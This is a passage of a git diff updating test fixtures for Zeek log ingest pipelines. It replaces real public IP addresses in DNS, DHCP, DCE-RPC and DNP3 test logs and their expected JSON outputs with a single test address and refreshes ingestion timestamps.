-97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "8.8.8.8", + "address": "89.160.20.156", "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "89.160.20.156", "packets": 1 }, "zeek": { @@ -1157,24 +1186,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 3356, + "number": 29518, "organization": { - "name": "Level 3 Parent, LLC" + "name": "Bredband2 AB" } }, - "address": "4.4.2.2", + "address": "89.160.20.156", "port": 38334, "bytes": 103, - "ip": "4.4.2.2", + "ip": "89.160.20.156", "packets": 1 }, "tags": [ @@ -1184,7 +1216,7 @@ ], "network": { "protocol": "dns", - "community_id": "1:hWC6cnCoeyQehzquxJQU6Y3Wm3g=", + "community_id": "1:4cXkRTqm06ivkFYCdZrC+CqSISU=", "transport": "udp", "bytes": 309, "packets": 2, @@ -1196,8 +1228,7 @@ }, "related": { "ip": [ - "4.4.2.2", - "8.8.8.8" + "89.160.20.156" ] }, "host": { @@ -1205,8 +1236,8 @@ }, "event": { "duration": 76967000, - "ingested": "2021-08-26T12:37:08.253346340Z", - "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"4.4.2.2\",\"id.orig_p\":38334,\"id.resp_h\":\"8.8.8.8\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", + "ingested": "2021-12-09T13:50:56.388791300Z", + "original": "{\"ts\":1547188417.857497,\"uid\":\"CAcJw21BbVedgFnYH5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38334,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":53,\"proto\":\"udp\",\"service\":\"dns\",\"duration\":0.076967,\"orig_bytes\":75,\"resp_bytes\":178,\"conn_state\":\"SF\",\"local_orig\":false,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"Dd\",\"orig_pkts\":1,\"orig_ip_bytes\":103,\"resp_pkts\":1,\"resp_ip_bytes\":206,\"tunnel_parents\":[]}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CAcJw21BbVedgFnYH5", @@ -1226,30 +1257,15 @@ "related": { "ip": [ "10.0.2.15", - "172.217.9.68" + "172.16.9.68" ] }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, - "address": "172.217.9.68", + "address": "172.16.9.68", "port": 80, "bytes": 0, - "ip": "172.217.9.68", - "packets": 0 + "packets": 0, + "ip": "172.16.9.68" }, "zeek": { "session_id": "C2KP1V3alRLoxl4JB9", @@ -1270,8 +1286,8 @@ "ip": "10.0.2.15" }, "event": { - "ingested": "2021-08-26T12:37:08.253359559Z", - "original": "{\"ts\":\"2021-06-09T20:55:13.160328Z\",\"uid\":\"C2KP1V3alRLoxl4JB9\",\"id.orig_h\":\"10.0.2.15\",\"id.orig_p\":46408,\"id.resp_h\":\"172.217.9.68\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", + "ingested": "2021-12-09T13:50:56.388795400Z", + "original": "{\"ts\":\"2021-06-09T20:55:13.160328Z\",\"uid\":\"C2KP1V3alRLoxl4JB9\",\"id.orig_h\":\"10.0.2.15\",\"id.orig_p\":46408,\"id.resp_h\":\"172.16.9.68\",\"id.resp_p\":80,\"proto\":\"tcp\",\"conn_state\":\"OTH\",\"local_orig\":true,\"local_resp\":false,\"missed_bytes\":0,\"history\":\"C\",\"orig_pkts\":0,\"orig_ip_bytes\":0,\"resp_pkts\":0,\"resp_ip_bytes\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C2KP1V3alRLoxl4JB9", @@ -1287,7 +1303,7 @@ "local_resp" ], "network": { - "community_id": "1:DzqI9CYXjMSYV8VoSAHtMNfMIeU=", + "community_id": "1:BpfDLJrzNMSM1hdv6f9vMTJQSW4=", "transport": "tcp", "bytes": 0, "packets": 0, diff --git a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json index 4adc103fc6b..a8a9d8bf689 100644 --- a/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json +++ b/packages/zeek/data_stream/dce_rpc/_dev/test/pipeline/test-dce-rpc.log-expected.json @@ -31,7 +31,7 @@ "ip": "172.16.133.6" }, "event": { - "ingested": "2021-08-11T19:18:23.868060300Z", + "ingested": "2021-12-09T13:50:58.323937300Z", "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -102,7 +102,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:23.868075800Z", + "ingested": "2021-12-09T13:50:58.323944800Z", "original": "{\"ts\":1361916332.298338,\"uid\":\"CsNHVHa1lzFtvJzT8\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"rtt\":0.09211,\"named_pipe\":\"\\u005cPIPE\\u005cbrowser\",\"endpoint\":\"browser\",\"operation\":\"BrowserrQueryOtherDomains\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json index 23872a3ee32..8c7578663fc 100644 --- a/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json +++ b/packages/zeek/data_stream/dhcp/_dev/test/pipeline/test-dhcp.log-expected.json @@ -63,7 +63,7 @@ "address": "192.168.199.132" }, "event": { - "ingested": "2021-08-11T19:18:24.271234400Z", + "ingested": "2021-12-09T13:50:58.676860500Z", "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -139,7 +139,7 @@ "address": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:24.271245700Z", + "ingested": "2021-12-09T13:50:58.676864400Z", "original": "{\"ts\":1617088722.072416,\"uids\":[\"Ck0tsG4wsJxI3lIEZ\"],\"client_addr\":\"10.156.0.2\",\"server_addr\":\"169.254.169.254\",\"mac\":\"42:01:0a:9c:00:02\",\"domain\":\"c.elastic-sa.internal\",\"assigned_addr\":\"10.156.0.2\",\"lease_time\":86400.0,\"msg_types\":[\"ACK\"],\"duration\":0.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -227,7 +227,7 @@ "address": "192.168.199.132" }, "event": { - "ingested": "2021-08-11T19:18:24.271254Z", + "ingested": "2021-12-09T13:50:58.676870800Z", "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json index 51dba040150..d9c25a2dd6d 100644 --- a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json +++ b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json @@ -29,7 +29,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-08-11T19:18:24.752747600Z", + "ingested": "2021-12-09T13:50:59.129296Z", "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -98,7 +98,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:24.752760Z", + "ingested": "2021-12-09T13:50:59.129299400Z", "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log index 26ffabc9a4a..a3a633526de 100644 --- a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log +++ b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log @@ -1,8 +1,8 @@ -{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","35.199.178.4"],"TTLs":[119.0,119.0,59.0],"rejected":false} +{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","89.160.20.156"],"TTLs":[119.0,119.0,59.0],"rejected":false} {"ts":1567095830.680046,"uid":"C19a1k4lTv46YMbeOk","id.orig_h":"fe80::4ef:15cf:769f:ff21","id.orig_p":5353,"id.resp_h":"ff02::fb","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","qclass":1,"qclass_name":"C_INTERNET","qtype":12,"qtype_name":"PTR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} {"ts":1567095830.734329,"uid":"CdiVAw7jJw6gsX5H","id.orig_h":"192.168.86.237","id.orig_p":5353,"id.resp_h":"224.0.0.251","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","rcode":0,"rcode_name":"NOERROR","AA":true,"TC":false,"RD":false,"RA":false,"Z":0,"answers":["bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local"],"TTLs":[120.0],"rejected":false} -{"ts":1617105592.091052,"uid":"CpwXdW4LQaJkaIgpk","id.orig_h":"10.156.0.2","id.orig_p":33438,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58036,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","51.116.158.62"],"TTLs":[13.0,18.0,8.0],"rejected":false} +{"ts":1617105592.091052,"uid":"CpwXdW4LQaJkaIgpk","id.orig_h":"10.156.0.2","id.orig_p":33438,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58036,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","89.160.20.156"],"TTLs":[13.0,18.0,8.0],"rejected":false} {"ts":1617105592.973919,"uid":"CO5TE748RoJEZuOThl","id.orig_h":"10.156.0.2","id.orig_p":60444,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":35744,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.akadns.net"],"TTLs":[296.0,287.0,287.0],"rejected":false} -{"ts":1617105592.9742,"uid":"CG1jsmeHcBCGnWXmk","id.orig_h":"10.156.0.2","id.orig_p":44310,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58458,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","20.190.159.132","40.126.31.143","20.190.159.134","40.126.31.1","20.190.159.136","40.126.31.135","40.126.31.6","20.190.159.138"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false} -{"ts":1617105593.106256,"uid":"ChP0cl4j5mbXSZ9TGf","id.orig_h":"10.156.0.2","id.orig_p":36364,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":8791,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","51.116.158.62"],"TTLs":[12.0,17.0,7.0],"rejected":false} +{"ts":1617105592.9742,"uid":"CG1jsmeHcBCGnWXmk","id.orig_h":"10.156.0.2","id.orig_p":44310,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58458,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","89.160.20.156","40.126.31.143","89.160.20.156","40.126.31.1","89.160.20.156","40.126.31.135","40.126.31.6","89.160.20.156"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false} +{"ts":1617105593.106256,"uid":"ChP0cl4j5mbXSZ9TGf","id.orig_h":"10.156.0.2","id.orig_p":36364,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":8791,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","89.160.20.156"],"TTLs":[12.0,17.0,7.0],"rejected":false} {"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/dns.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json index 181b6643b21..4f55d3cd81c 100644 --- a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json @@ -8,7 +8,7 @@ }, "dns": { "resolved_ip": [ - "35.199.178.4" + "89.160.20.156" ], "response_code": "NOERROR", "question": { @@ -29,7 +29,7 @@ "ttl": 119 }, { - "data": "35.199.178.4", + "data": "89.160.20.156", "ttl": 59 } ], @@ -56,7 +56,7 @@ "answers": [ "proxy-production-us-west1.gcp.cloud.es.io", "proxy-production-us-west1-v1-009.gcp.cloud.es.io", - "35.199.178.4" + "89.160.20.156" ], "trans_id": "15209", "rcode": 0, @@ -94,8 +94,8 @@ }, "event": { "duration": 7.6967E7, - "ingested": "2021-08-11T19:18:25.340416200Z", - "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":15209,\"rtt\":0.076967,\"query\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":1,\"qtype_name\":\"A\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":true,\"RA\":true,\"Z\":0,\"answers\":[\"proxy-production-us-west1.gcp.cloud.es.io\",\"proxy-production-us-west1-v1-009.gcp.cloud.es.io\",\"35.199.178.4\"],\"TTLs\":[119.0,119.0,59.0],\"rejected\":false}", + "ingested": "2021-12-09T13:50:59.483477600Z", + "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":15209,\"rtt\":0.076967,\"query\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":1,\"qtype_name\":\"A\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":true,\"RA\":true,\"Z\":0,\"answers\":[\"proxy-production-us-west1.gcp.cloud.es.io\",\"proxy-production-us-west1-v1-009.gcp.cloud.es.io\",\"89.160.20.156\"],\"TTLs\":[119.0,119.0,59.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CAcJw21BbVedgFnYH3", @@ -164,7 +164,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:25.340431700Z", + "ingested": "2021-12-09T13:50:59.483485800Z", "original": "{\"ts\":1567095830.680046,\"uid\":\"C19a1k4lTv46YMbeOk\",\"id.orig_h\":\"fe80::4ef:15cf:769f:ff21\",\"id.orig_p\":5353,\"id.resp_h\":\"ff02::fb\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":12,\"qtype_name\":\"PTR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -245,7 +245,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:25.340436800Z", + "ingested": "2021-12-09T13:50:59.483491400Z", "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -269,7 +269,7 @@ }, "dns": { "resolved_ip": [ - "51.116.158.62" + "89.160.20.156" ], "response_code": "NOERROR", "question": { @@ -288,7 +288,7 @@ "ttl": 18 }, { - "data": "51.116.158.62", + "data": "89.160.20.156", "ttl": 8 } ], @@ -312,7 +312,7 @@ "answers": [ "manage.office.com.trafficmanager.net", "o365adtapiproddeu001.cloudapp.net", - "51.116.158.62" + "89.160.20.156" ], "trans_id": "58036", "rcode": 0, @@ -346,8 +346,8 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:25.340440300Z", - "original": "{\"ts\":1617105592.091052,\"uid\":\"CpwXdW4LQaJkaIgpk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":33438,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58036,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"51.116.158.62\"],\"TTLs\":[13.0,18.0,8.0],\"rejected\":false}", + "ingested": "2021-12-09T13:50:59.483496800Z", + "original": "{\"ts\":1617105592.091052,\"uid\":\"CpwXdW4LQaJkaIgpk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":33438,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58036,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[13.0,18.0,8.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CpwXdW4LQaJkaIgpk", @@ -445,7 +445,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:25.340446100Z", + "ingested": "2021-12-09T13:50:59.483502200Z", "original": "{\"ts\":1617105592.973919,\"uid\":\"CO5TE748RoJEZuOThl\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60444,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":35744,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.akadns.net\"],\"TTLs\":[296.0,287.0,287.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -469,14 +469,14 @@ }, "dns": { "resolved_ip": [ - "20.190.159.132", + "89.160.20.156", "40.126.31.143", - "20.190.159.134", + "89.160.20.156", "40.126.31.1", - "20.190.159.136", + "89.160.20.156", "40.126.31.135", "40.126.31.6", - "20.190.159.138" + "89.160.20.156" ], "response_code": "NOERROR", "question": { @@ -499,7 +499,7 @@ "ttl": 243 }, { - "data": "20.190.159.132", + "data": "89.160.20.156", "ttl": 243 }, { @@ -507,7 +507,7 @@ "ttl": 243 }, { - "data": "20.190.159.134", + "data": "89.160.20.156", "ttl": 243 }, { @@ -515,7 +515,7 @@ "ttl": 243 }, { - "data": "20.190.159.136", + "data": "89.160.20.156", "ttl": 243 }, { @@ -527,7 +527,7 @@ "ttl": 243 }, { - "data": "20.190.159.138", + "data": "89.160.20.156", "ttl": 243 } ], @@ -560,14 +560,14 @@ "a.privatelink.msidentity.com", "prda.aadg.msidentity.com", "www.tm.a.prd.aadg.trafficmanager.net", - "20.190.159.132", + "89.160.20.156", "40.126.31.143", - "20.190.159.134", + "89.160.20.156", "40.126.31.1", - "20.190.159.136", + "89.160.20.156", "40.126.31.135", "40.126.31.6", - "20.190.159.138" + "89.160.20.156" ], "trans_id": "58458", "rcode": 0, @@ -601,8 +601,8 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:25.340451500Z", - "original": "{\"ts\":1617105592.9742,\"uid\":\"CG1jsmeHcBCGnWXmk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44310,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58458,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.trafficmanager.net\",\"20.190.159.132\",\"40.126.31.143\",\"20.190.159.134\",\"40.126.31.1\",\"20.190.159.136\",\"40.126.31.135\",\"40.126.31.6\",\"20.190.159.138\"],\"TTLs\":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],\"rejected\":false}", + "ingested": "2021-12-09T13:50:59.483507600Z", + "original": "{\"ts\":1617105592.9742,\"uid\":\"CG1jsmeHcBCGnWXmk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44310,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58458,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.trafficmanager.net\",\"89.160.20.156\",\"40.126.31.143\",\"89.160.20.156\",\"40.126.31.1\",\"89.160.20.156\",\"40.126.31.135\",\"40.126.31.6\",\"89.160.20.156\"],\"TTLs\":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CG1jsmeHcBCGnWXmk", @@ -625,7 +625,7 @@ }, "dns": { "resolved_ip": [ - "51.116.158.62" + "89.160.20.156" ], "response_code": "NOERROR", "question": { @@ -644,7 +644,7 @@ "ttl": 17 }, { - "data": "51.116.158.62", + "data": "89.160.20.156", "ttl": 7 } ], @@ -668,7 +668,7 @@ "answers": [ "manage.office.com.trafficmanager.net", "o365adtapiproddeu001.cloudapp.net", - "51.116.158.62" + "89.160.20.156" ], "trans_id": "8791", "rcode": 0, @@ -702,8 +702,8 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:25.340458500Z", - "original": "{\"ts\":1617105593.106256,\"uid\":\"ChP0cl4j5mbXSZ9TGf\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":36364,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":8791,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"51.116.158.62\"],\"TTLs\":[12.0,17.0,7.0],\"rejected\":false}", + "ingested": "2021-12-09T13:50:59.483513Z", + "original": 